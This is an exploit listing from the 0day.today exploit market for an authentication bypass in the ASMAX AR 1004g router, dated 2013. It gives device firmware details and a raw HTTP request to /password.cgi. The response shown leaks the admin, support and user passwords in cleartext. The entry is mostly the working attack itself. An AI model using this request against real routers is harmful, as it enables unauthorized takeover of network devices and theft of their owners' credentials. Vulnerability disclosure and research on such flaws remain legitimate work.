[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ASMAX AR 1004g Authentication Bypass Vulnerability

Author
lucyoa
Risk
[
Security Risk High
]
0day-ID
0day-ID-20264
Category
web applications
Date add
30-01-2013
Platform
hardware
# Exploit Title: ASMAX AR 1004g Authentication Bypass
# Date: 30.01.2013
# Exploit Author: lucyoa
# Vendor Homepage: asmax.pl

ASMAX AR 1004g is the most popular router device from asmax.

------------------- Device Info --------------------------
Board ID: 96333EW
Software Version: AR1004g-V2-B014
Bootloader (CFE) Version: before 1.0.37-5.12
Wireless Driver Version: 4.174.64.19.cpe1.0sd

------------------- Exploit ------------------------------
Request for password.cgi:

GET /password.cgi HTTP/1.1
Host: 10.0.0.2
User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+
xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive

Response:

(..)
pwdAdmin = 'admin_password';
pwdSupport = 'support_password';
pwdUser = 'user_password';
(..)

#  0day.today [2024-11-15]  #